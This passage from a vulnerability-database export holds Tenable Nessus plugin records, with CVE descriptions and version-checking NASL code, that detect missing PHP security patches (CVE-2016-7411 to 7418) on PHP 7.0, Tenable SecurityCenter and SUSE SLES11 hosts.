script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:php:php\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"php_version.nasl\");\n script_require_keys(\"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\nphp = get_php_from_kb(\n port : port,\n exit_on_fail : TRUE\n);\n\nversion = php[\"ver\"];\nsource = php[\"src\"];\n\nbackported = get_kb_item('www/php/'+port+'/'+version+'/backported');\n\nif (report_paranoia < 2 && backported)\n audit(AUDIT_BACKPORT_SERVICE, port, \"PHP \"+version+\" install\");\n\n# Check that it is the correct version of PHP\nif (version =~ \"^7(\\.0)?$\")\n audit(AUDIT_VER_NOT_GRANULAR, \"PHP\", port, version);\nif (version !~ \"^7\\.0\\.\") audit(AUDIT_NOT_DETECT, \"PHP version 7.0.x\", port);\n\nif (version =~ \"^7\\.0\\.\" && ver_compare(ver:version, fix:\"7.0.11\", strict:FALSE) < 0){\n security_report_v4(\n port : port,\n extra :\n '\\n Version source : ' + source +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 7.0.11' +\n '\\n',\n severity:SECURITY_HOLE\n );\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"PHP\", port, version);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:14:18", "description": "The Tenable SecurityCenter application installed on the remote host is missing a security patch. It is, therefore, affected by multiple vulnerabilities in the bundled version of PHP :\n\n - A flaw exists in ext/standard/var_unserializer.re when destroying deserialized objects due to improper validation of user-supplied input. An unauthenticated, remote attacker can exploit this, via a deserialize call that references a partially constructed object, to corrupt memory, resulting in a denial of service condition. (CVE-2016-7411)\n\n - An heap buffer overflow condition exists in the php_mysqlnd_rowp_read_text_protocol_aux() function within file ext/mysqlnd/mysqlnd_wireprotocol.c due to a failure to verify that a BIT field has the UNSIGNED_FLAG flag. An unauthenticated, remote attacker can exploit this, via specially crafted field metadata, to cause a denial of service condition. (CVE-2016-7412)\n\n - A use-after-free error exists in the wddx_stack_destroy() function within file ext/wddx/wddx.c when deserializing recordset elements.\n An unauthenticated, remote attacker can exploit this, via a specially crafted wddxPacket XML document, to cause a denial of service condition. (CVE-2016-7413)\n\n - An out-of-bounds access error exists in the phar_parse_zipfile() function within file ext/phar/zip.c due to a failure to ensure that the uncompressed_filesize field is large enough. An unauthenticated, remote attacker can exploit this, via a specially crafted archive, to cause a denial of service condition. (CVE-2016-7414)\n\n - A stack-based buffer overflow condition exists in the ICU4C library, specifically within file common/locid.cpp in the msgfmt_format_message() function, due to a failure to properly restrict the locale length provided to the Locale class. An unauthenticated, remote attacker can exploit this, via a long first argument to a MessageFormatter::formatMessage() function call, to cause a denial of service condition. (CVE-2016-7416)\n\n - A flaw exists in the spl_array_get_dimension_ptr_ptr() function within file ext/spl/spl_array.c due to a failure to properly validate the return value and data type when deserializing SplArray. An unauthenticated, remote attacker can exploit this, via specially crafted serialized data, to cause a denial of service condition.\n (CVE-2016-7417)\n\n - An out-of-bounds read error exists in the php_wddx_push_element() function within file ext/wddx/wddx.c when handling an incorrect boolean element, which leads to mishandling the wddx_deserialize() call. An unauthenticated, remote attacker can exploit this, via a specially crafted wddxPacket XML document, to cause a denial of service condition. (CVE-2016-7418)\n\n - An out-of-bounds access error exists in the phar_parse_tarfile() function within file ext/phar/tar.c when handling the verification of signatures. An unauthenticated, remote attacker can exploit this to cause an unspecified impact.\n\n - An integer overflow condition exists in the fgetcsv() function when handling CSV field lengths due to improper validation of certain input. An unauthenticated, remote attacker can exploit this to corrupt memory, resulting in a denial of service condition or the execution of arbitrary code.\n\n - An integer overflow condition exists in the wordwrap() function within file ext/standard/string.c due to improper validation of certain input. An unauthenticated, remote attacker can exploit this to corrupt memory, resulting in a denial of service condition or the execution of arbitrary code.\n\n - An integer overflow condition exists in the fgets() function within file ext/standard/file.c due to improper validation of certain input. An unauthenticated, remote attacker can exploit this to corrupt memory, resulting in a denial of service condition or the execution of arbitrary code.\n\n - An integer overflow condition exists in the xml_utf8_encode() function within file ext/xml/xml.c due to improper validation of certain input. An unauthenticated, remote attacker can exploit this to cause an unspecified impact.\n\n - A flaw exists in the exif_process_IFD_in_TIFF() function within file ext/exif/exif.c when handling uninitialized thumbnail data. An unauthenticated, remote attacker can exploit this to disclose memory contents.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2017-06-26T00:00:00", "type": "nessus", "title": "Tenable SecurityCenter PHP < 5.6.26 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-7411", "CVE-2016-7412", "CVE-2016-7413", "CVE-2016-7414", "CVE-2016-7416", "CVE-2016-7417", "CVE-2016-7418"], "modified": "2020-10-09T00:00:00", "cpe": ["cpe:/a:tenable:securitycenter"], "id": "SECURITYCENTER_PHP_5_6_26.NASL", "href": "https://www.tenable.com/plugins/nessus/101048", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(101048);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/09\");\n\n script_cve_id(\n \"CVE-2016-7411\",\n \"CVE-2016-7412\",\n \"CVE-2016-7413\",\n \"CVE-2016-7414\",\n \"CVE-2016-7416\",\n \"CVE-2016-7417\",\n \"CVE-2016-7418\"\n );\n script_bugtraq_id(\n 93004,\n 93005,\n 93006,\n 93007,\n 93008,\n 93009,\n 93011\n );\n\n script_name(english:\"Tenable SecurityCenter PHP < 5.6.26 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of PHP in SecurityCenter.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Tenable SecurityCenter application on the remote host contains a\nPHP library that is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Tenable SecurityCenter application installed on the remote host\nis missing a security patch. It is, therefore, affected by multiple\nvulnerabilities in the bundled version of PHP :\n\n - A flaw exists in ext/standard/var_unserializer.re when\n destroying deserialized objects due to improper\n validation of user-supplied input. An unauthenticated,\n remote attacker can exploit this, via a deserialize\n call that references a partially constructed object, to\n corrupt memory, resulting in a denial of service\n condition. (CVE-2016-7411)\n\n - An heap buffer overflow condition exists in the\n php_mysqlnd_rowp_read_text_protocol_aux() function\n within file ext/mysqlnd/mysqlnd_wireprotocol.c due to\n a failure to verify that a BIT field has the\n UNSIGNED_FLAG flag. An unauthenticated, remote attacker\n can exploit this, via specially crafted field metadata,\n to cause a denial of service condition. (CVE-2016-7412)\n\n - A use-after-free error exists in the\n wddx_stack_destroy() function within file\n ext/wddx/wddx.c when deserializing recordset elements.\n An unauthenticated, remote attacker can exploit this,\n via a specially crafted wddxPacket XML document, to\n cause a denial of service condition. (CVE-2016-7413)\n\n - An out-of-bounds access error exists in the\n phar_parse_zipfile() function within file ext/phar/zip.c\n due to a failure to ensure that the\n uncompressed_filesize field is large enough. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted archive, to cause a denial of service\n condition. (CVE-2016-7414)\n\n - A stack-based buffer overflow condition exists in the\n ICU4C library, specifically within file common/locid.cpp\n in the msgfmt_format_message() function, due to a\n failure to properly restrict the locale length provided\n to the Locale class. An unauthenticated, remote attacker\n can exploit this, via a long first argument to a\n MessageFormatter::formatMessage() function call, to\n cause a denial of service condition. (CVE-2016-7416)\n\n - A flaw exists in the spl_array_get_dimension_ptr_ptr()\n function within file ext/spl/spl_array.c due to a\n failure to properly validate the return value and data\n type when deserializing SplArray. An unauthenticated,\n remote attacker can exploit this, via specially crafted\n serialized data, to cause a denial of service condition.\n (CVE-2016-7417)\n\n - An out-of-bounds read error exists in the\n php_wddx_push_element() function within file\n ext/wddx/wddx.c when handling an incorrect boolean\n element, which leads to mishandling the\n wddx_deserialize() call. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n wddxPacket XML document, to cause a denial of service\n condition. (CVE-2016-7418)\n\n - An out-of-bounds access error exists in the\n phar_parse_tarfile() function within file ext/phar/tar.c\n when handling the verification of signatures. An\n unauthenticated, remote attacker can exploit this to\n cause an unspecified impact.\n\n - An integer overflow condition exists in the fgetcsv()\n function when handling CSV field lengths due to improper\n validation of certain input. An unauthenticated, remote\n attacker can exploit this to corrupt memory, resulting\n in a denial of service condition or the execution of\n arbitrary code.\n\n - An integer overflow condition exists in the wordwrap()\n function within file ext/standard/string.c due to\n improper validation of certain input. An\n unauthenticated, remote attacker can exploit this to\n corrupt memory, resulting in a denial of service\n condition or the execution of arbitrary code.\n\n - An integer overflow condition exists in the fgets()\n function within file ext/standard/file.c due to improper\n validation of certain input. An unauthenticated, remote\n attacker can exploit this to corrupt memory, resulting\n in a denial of service condition or the execution of\n arbitrary code.\n\n - An integer overflow condition exists in the\n xml_utf8_encode() function within file ext/xml/xml.c due\n to improper validation of certain input. An\n unauthenticated, remote attacker can exploit this to\n cause an unspecified impact.\n\n - A flaw exists in the exif_process_IFD_in_TIFF() function\n within file ext/exif/exif.c when handling uninitialized\n thumbnail data. An unauthenticated, remote attacker can\n exploit this to disclose memory contents.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://php.net/ChangeLog-5.php#5.6.26\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to SecurityCenter version 5.4.1 or later. Alternatively,\ncontact the vendor for a patch.\");\n script_set_attribute(attribute:\"agent\", value:\"unix\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"manual\");\n script_set_attribute(attribute:\"cvss_score_rationale\", value:\"Score based on analysis of the vendor advisory.\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n \n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/09/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:tenable:securitycenter\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"securitycenter_installed.nbin\", \"securitycenter_detect.nbin\");\n script_require_keys(\"Host/SecurityCenter/Version\", \"installed_sw/SecurityCenter\", \"Host/SecurityCenter/support/php/version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\napp = 'PHP (within SecurityCenter)';\nfix = \"5.6.26\";\n\nsc_ver = get_kb_item(\"Host/SecurityCenter/Version\");\nport = 0;\nif(empty_or_null(sc_ver))\n{\n port = 443;\n install = get_single_install(app_name:\"SecurityCenter\", combined:TRUE, exit_if_unknown_ver:TRUE);\n sc_ver = install[\"version\"];\n}\nif (empty_or_null(sc_ver)) audit(AUDIT_NOT_INST, \"SecurityCenter\");\n\nversion = get_kb_item(\"Host/SecurityCenter/support/php/version\");\nif (empty_or_null(version)) audit(AUDIT_UNKNOWN_APP_VER, app);\n\nif (ver_compare(ver:version, minver:\"5.6.0\", fix:fix, strict:FALSE) < 0)\n{\n report =\n '\\n SecurityCenter version : ' + sc_ver +\n '\\n SecurityCenter PHP version : ' + version +\n '\\n Fixed PHP version : ' + fix +\n '\\n';\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:report);\n exit(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, app, version);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:11:09", "description": "This update for php53 fixes the following issues :\n\n - CVE-2016-7411: php5: Memory corruption when destructing deserialized object\n\n - CVE-2016-7412: Heap overflow in mysqlnd when not receiving UNSIGNED_FLAG in BIT field\n\n - CVE-2016-7413: Use after free in wddx_deserialize\n\n - CVE-2016-7414: Out of bounds heap read when verifying signature of zip phar in phar_parse_zipfile\n\n - CVE-2016-7416: Stack based buffer overflow in msgfmt_format_message\n\n - CVE-2016-7417: Missing type check when unserializing SplArray\n\n - CVE-2016-7418: NULL pointer dereference in php_wddx_push_element\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-10-06T00:00:00", "type": "nessus", "title": "SUSE SLES11 Security Update : php53 (SUSE-SU-2016:2461-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-7411", "CVE-2016-7412", "CVE-2016-7413", "CVE-2016-7414", "CVE-2016-7416", "CVE-2016-7417", "CVE-2016-7418"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:apache2-mod_php53", "p-cpe:/a:novell:suse_linux:php53", "p-cpe:/a:novell:suse_linux:php53-bcmath", "p-cpe:/a:novell:suse_linux:php53-bz2", "p-cpe:/a:novell:suse_linux:php53-calendar", "p-cpe:/a:novell:suse_linux:php53-ctype", "p-cpe:/a:novell:suse_linux:php53-curl", "p-cpe:/a:novell:suse_linux:php53-dba", "p-cpe:/a:novell:suse_linux:php53-dom", "p-cpe:/a:novell:suse_linux:php53-exif", "p-cpe:/a:novell:suse_linux:php53-fastcgi", "p-cpe:/a:novell:suse_linux:php53-fileinfo", "p-cpe:/a:novell:suse_linux:php53-ftp", "p-cpe:/a:novell:suse_linux:php53-gd", "p-cpe:/a:novell:suse_linux:php53-gettext", "p-cpe:/a:novell:suse_linux:php53-gmp", "p-cpe:/a:novell:suse_linux:php53-iconv", "p-cpe:/a:novell:suse_linux:php53-intl", "p-cpe:/a:novell:suse_linux:php53-json", "p-cpe:/a:novell:suse_linux:php53-ldap", "p-cpe:/a:novell:suse_linux:php53-mbstring", "p-cpe:/a:novell:suse_linux:php53-mcrypt", "p-cpe:/a:novell:suse_linux:php53-mysql", "p-cpe:/a:novell:suse_linux:php53-odbc", "p-cpe:/a:novell:suse_linux:php53-openssl", "p-cpe:/a:novell:suse_linux:php53-pcntl", "p-cpe:/a:novell:suse_linux:php53-pdo", "p-cpe:/a:novell:suse_linux:php53-pear", "p-cpe:/a:novell:suse_linux:php53-pgsql", "p-cpe:/a:novell:suse_linux:php53-pspell", "p-cpe:/a:novell:suse_linux:php53-shmop", "p-cpe:/a:novell:suse_linux:php53-snmp", "p-cpe:/a:novell:suse_linux:php53-soap", "p-cpe:/a:novell:suse_linux:php53-suhosin", "p-cpe:/a:novell:suse_linux:php53-sysvmsg", "p-cpe:/a:novell:suse_linux:php53-sysvsem", "p-cpe:/a:novell:suse_linux:php53-sysvshm", "p-cpe:/a:novell:suse_linux:php53-tokenizer", "p-cpe:/a:novell:suse_linux:php53-wddx", "p-cpe:/a:novell:suse_linux:php53-xmlreader", "p-cpe:/a:novell:suse_linux:php53-xmlrpc", "p-cpe:/a:novell:suse_linux:php53-xmlwriter", "p-cpe:/a:novell:suse_linux:php53-xsl", "p-cpe:/a:novell:suse_linux:php53-zip", "p-cpe:/a:novell:suse_linux:php53-zlib", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_SU-2016-2461-1.NASL", "href": "https://www.tenable.com/plugins/nessus/93895", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2016:2461-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93895);\n script_version(\"2.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-7411\", \"CVE-2016-7412\", \"CVE-2016-7413\", \"CVE-2016-7414\", \"CVE-2016-7416\", \"CVE-2016-7417\", \"CVE-2016-7418\");\n\n script_name(english:\"SUSE SLES11 Security Update : php53 (SUSE-SU-2016:2461-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for php53 fixes the following issues :\n\n - CVE-2016-7411: php5: Memory corruption when destructing\n deserialized object\n\n - CVE-2016-7412: Heap overflow in mysqlnd when not\n receiving UNSIGNED_FLAG in BIT field\n\n - CVE-2016-7413: Use after free in wddx_deserialize\n\n - CVE-2016-7414: Out of bounds heap read when verifying\n signature of zip phar in phar_parse_zipfile\n\n - CVE-2016-7416: Stack based buffer overflow in\n msgfmt_format_message\n\n - CVE-2016-7417: Missing type check when unserializing\n SplArray\n\n - CVE-2016-7418: NULL pointer dereference in\n php_wddx_push_element\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=999679\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=999680\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=999682\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=999684\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=999685\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=999819\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=999820\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7411/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7412/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7413/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7414/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7416/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7417/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7418/\"\n );\n # https://www.suse.com/support/update/announcement/2016/suse-su-20162461-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?82e09090\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 11-SP2-LTSS:zypper in -t patch\nslessp2-php53-12776=1\n\nSUSE Linux Enterprise Debuginfo 11-SP2:zypper in -t patch\ndbgsp2-php53-12776=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-mod_php53\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-bz2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-calendar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-ctype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-dom\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-exif\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-fastcgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-fileinfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-ftp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-gettext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-iconv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-pcntl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-shmop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-suhosin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-sysvmsg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-sysvsem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-sysvshm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-tokenizer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-wddx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-xmlreader\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-xmlwriter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-zip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/09/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"apache2-mod_php53-5.3.17-58.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-5.3.17-58.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-bcmath-5.3.17-58.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-bz2-5.3.17-58.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-calendar-5.3.17-58.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-ctype-5.3.17-58.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-curl-5.3.17-58.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-dba-5.3.17-58.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-dom-5.3.17-58.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-exif-5.3.17-58.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-fastcgi-5.3.17-58.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-fileinfo-5.3.17-58.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-ftp-5.3.17-58.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-gd-5.3.17-58.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-gettext-5.3.17-58.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-gmp-5.3.17-58.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-iconv-5.3.17-58.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-intl-5.3.17-58.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-json-5.3.17-58.1\")) flag++;\nif (rpm_check(release:\"SLES11\", 